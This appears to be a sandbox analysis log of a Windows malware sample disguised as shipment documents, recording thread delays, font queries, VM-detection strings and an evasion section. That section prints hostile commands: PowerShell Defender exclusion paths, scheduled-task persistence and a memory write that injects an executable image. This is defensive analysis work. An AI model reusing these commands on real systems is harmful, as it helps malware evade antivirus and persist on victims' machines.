Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597275
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597154
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597047
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596937
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596828
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596718
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596609
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596500
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596390
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596281
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596172
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596062
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595953
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595843
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595734
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595625
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595515
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595406
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595297
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595187
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595068
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594953
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594844
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594734
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594624
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594515
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594406
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599779
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599292
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599175
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599054
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598836
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598607
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598171
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597843
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597624
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597296
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597078
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596968
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596859
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596740
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596280
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595609
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595281
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594952
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594843
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594496
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594221
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 594073
Source: rShipmentDocuments.exe, 00000009.00000002.4135329351.0000000000E18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: ZOlmYtPdlO.exe, 0000000A.00000002.1773124497.00000000080CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\T
Source: ZOlmYtPdlO.exe, 0000000A.00000002.1764660892.00000000009D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: ZOlmYtPdlO.exe, 00000010.00000002.4136109973.0000000001429000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F9328 LdrInitializeThunk, 9_2_068F9328
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory written: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Users\user\Desktop\rShipmentDocuments.exe VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
